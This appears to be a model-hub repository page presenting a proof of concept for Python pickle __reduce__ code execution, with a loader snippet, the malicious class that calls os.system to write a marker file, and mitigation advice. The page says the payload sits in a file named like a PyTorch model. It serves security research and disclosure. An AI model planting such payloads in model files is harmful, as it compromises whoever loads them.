You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Pickle `reduce` RCE PoC

⚠️ SECURITY RESEARCH — DO NOT USE IN PRODUCTION ⚠️

This repository demonstrates arbitrary code execution (ACE) via Python pickle deserialization through the __reduce__ protocol.

Vulnerability

Field	Value
Type	Deserialization → Arbitrary Code Execution
Format	`.pkl` (Python pickle)
Trigger	`pickle.load()` on untrusted file
Root Cause	`__reduce__` protocol allows arbitrary callable invocation

Reproduction

import pickle
import os

# Loading this file triggers os.system() — arbitrary code execution
with open("pytorch_model.pkl", "rb") as f:
    pickle.load(f)

# Check proof of execution
if os.path.exists("/tmp/poc_proof.txt"):
    print(open("/tmp/poc_proof.txt").read())

How It Works

class MaliciousModel:
    def __reduce__(self):
        return (os.system, ('echo "PWNED" > /tmp/poc_proof.txt',))

pickle.dump(MaliciousModel(), open("pytorch_model.pkl", "wb"))

When pickle.load() deserializes this object, it calls os.system(cmd) to "reconstruct" it — executing arbitrary commands.

Mitigation

Never use pickle.load() on untrusted files
Use torch.load(..., weights_only=True) for PyTorch models
Prefer .safetensors format

Disclaimer

This is a security research proof-of-concept for responsible vulnerability disclosure only.

Downloads last month: 3

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support